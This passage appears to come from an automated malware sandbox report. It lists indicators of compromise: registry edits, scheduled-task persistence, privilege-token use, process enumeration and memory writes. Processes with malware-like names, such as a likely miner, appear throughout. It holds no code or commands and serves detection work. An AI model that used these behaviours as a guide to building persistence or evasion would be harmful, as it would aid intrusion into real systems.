Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Wait = "C:\\Windows\\cursors\\aero_busy.ani"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\No = "C:\\Windows\\cursors\\aero_unavail.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\IBeam	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Appearance	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Help = "C:\\Windows\\cursors\\aero_helpsel.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\cursors\\aero_pen.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Crosshair	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\cursors\\aero_ns.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\cursors\\aero_ew.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Accessibility\HighContrast\Previous High Contrast Scheme MUI Value	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\cursors\\aero_arrow.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\cursors\\aero_working.ani"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\cursors\\aero_nesw.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\ = "Windows Default"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Scheme Source = "2"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Appearance\NewCurrent	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\cursors\\aero_nwse.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\cursors\\aero_up.cur"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Desktop\UserPreferencesMask = 9e1e078012000000	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Hand = "C:\\Windows\\cursors\\aero_link.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\cursors\\aero_move.cur"	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

SearchProtocolHost.exeSearchIndexer.exepowershell.exepowershell.exeSearchFilterHost.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-174 = "Microsoft PowerPoint Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-120 = "Microsoft Word 97 - 2003 Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9939 = "ADTS Audio"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\msinfo32.exe,-10001 = "System Information File"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration"	SearchIndexer.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000383d8bd95dc5da01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WTV	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\zipfldr.dll,-10195 = "Compressed (zipped) Folder"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E37A73F8-FB01-43DC-914E-AAEE76095AB9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000abe06cda5dc5da01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-1 = "Microsoft Language Detection"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-10 = "Microsoft Hangul Decomposition Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-7 = "Microsoft Devanagari to Latin Transliteration"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\acppage.dll,-6003 = "Windows Command Script"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-9 = "Microsoft Bengali to Latin Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000092148fd75dc5da01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Modifies registry class 1 IoCs

Processes:

OpenWith.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings OpenWith.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3860 schtasks.exe
7028 schtasks.exe
1408 schtasks.exe
4328 schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings	OpenWith.exe

pid	process
3860	schtasks.exe
7028	schtasks.exe
1408	schtasks.exe
4328	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exeuYtF.exewfbrmcwrltkl.exenatura.exenautr.exepowershell.exeetuamactyjne.exetaskmgr.exepseaptzkxyms.execonhost.exesupportoxmr.exeetc test.exepowershell.exepowershell.exe

pid	process
8	chrome.exe
8	chrome.exe
6484	uYtF.exe
6484	uYtF.exe
6484	uYtF.exe
6484	uYtF.exe
6484	uYtF.exe
6484	uYtF.exe
6484	uYtF.exe
6484	uYtF.exe
5888	wfbrmcwrltkl.exe
5888	wfbrmcwrltkl.exe
5888	wfbrmcwrltkl.exe
5888	wfbrmcwrltkl.exe
5888	wfbrmcwrltkl.exe
3524	natura.exe
3216	nautr.exe
6112	powershell.exe
6112	powershell.exe
3524	natura.exe
3216	nautr.exe
3524	natura.exe
3524	natura.exe
6112	powershell.exe
3216	nautr.exe
2364	etuamactyjne.exe
3216	nautr.exe
2364	etuamactyjne.exe
1008	taskmgr.exe
1008	taskmgr.exe
5780	pseaptzkxyms.exe
3432	conhost.exe
3432	conhost.exe
1008	taskmgr.exe
1008	taskmgr.exe
4640	supportoxmr.exe
3428	etc test.exe
3432	conhost.exe
3432	conhost.exe
3432	conhost.exe
3432	conhost.exe
1008	taskmgr.exe
1008	taskmgr.exe
6568	powershell.exe
6568	powershell.exe
1008	taskmgr.exe
1008	taskmgr.exe
5412	powershell.exe
5412	powershell.exe
3432	conhost.exe
3432	conhost.exe
1008	taskmgr.exe
1008	taskmgr.exe
3432	conhost.exe
3432	conhost.exe
1008	taskmgr.exe
3432	conhost.exe
3432	conhost.exe
1008	taskmgr.exe
6568	powershell.exe
3432	conhost.exe
3432	conhost.exe
5412	powershell.exe
1008	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

6080 OpenWith.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

chrome.exe

pid process

8 chrome.exe
8 chrome.exe
8 chrome.exe
8 chrome.exe
8 chrome.exe
8 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exeSearchIndexer.exe7zG.exe7zG.exe7zG.exeNew Text Document mod.exe4363463463464363463463463.exetaskkill.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	8	chrome.exe
Token: SeCreatePagefilePrivilege	8	chrome.exe
Token: SeShutdownPrivilege	8	chrome.exe
Token: SeCreatePagefilePrivilege	8	chrome.exe
Token: SeShutdownPrivilege	8	chrome.exe
Token: SeCreatePagefilePrivilege	8	chrome.exe
Token: SeShutdownPrivilege	8	chrome.exe
Token: SeCreatePagefilePrivilege	8	chrome.exe
Token: SeShutdownPrivilege	8	chrome.exe
Token: SeCreatePagefilePrivilege	8	chrome.exe
Token: SeShutdownPrivilege	8	chrome.exe
Token: SeCreatePagefilePrivilege	8	chrome.exe
Token: 33	1444	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1444	SearchIndexer.exe
Token: SeRestorePrivilege	5776	7zG.exe
Token: 35	5776	7zG.exe
Token: SeSecurityPrivilege	5776	7zG.exe
Token: SeSecurityPrivilege	5776	7zG.exe
Token: SeRestorePrivilege	5880	7zG.exe
Token: 35	5880	7zG.exe
Token: SeSecurityPrivilege	5880	7zG.exe
Token: SeSecurityPrivilege	5880	7zG.exe
Token: SeRestorePrivilege	5972	7zG.exe
Token: 35	5972	7zG.exe
Token: SeSecurityPrivilege	5972	7zG.exe
Token: SeSecurityPrivilege	5972	7zG.exe
Token: SeDebugPrivilege	936	New Text Document mod.exe
Token: SeDebugPrivilege	6316	4363463463464363463463463.exe
Token: SeDebugPrivilege	5136	taskkill.exe
Token: SeShutdownPrivilege	5556	powercfg.exe
Token: SeCreatePagefilePrivilege	5556	powercfg.exe
Token: SeShutdownPrivilege	5408	powercfg.exe
Token: SeCreatePagefilePrivilege	5408	powercfg.exe
Token: SeShutdownPrivilege	5600	powercfg.exe
Token: SeCreatePagefilePrivilege	5600	powercfg.exe
Token: SeShutdownPrivilege	5680	powercfg.exe
Token: SeCreatePagefilePrivilege	5680	powercfg.exe
Token: SeShutdownPrivilege	5840	powercfg.exe
Token: SeCreatePagefilePrivilege	5840	powercfg.exe
Token: SeShutdownPrivilege	5856	powercfg.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe7zG.exe7zG.exe7zG.exetaskmgr.exe

pid	process
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
5776	7zG.exe
5880	7zG.exe
5972	7zG.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
8	chrome.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe
1008	taskmgr.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

OpenWith.exeRegAsm.exe%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exeMsBuild.exe

pid	process
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
6080	OpenWith.exe
4820	RegAsm.exe
5256	%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe
6904	MsBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 8 wrote to memory of 4404	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 4404	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1124	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 4788	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 4788	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe
PID 8 wrote to memory of 1592	8	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.exe
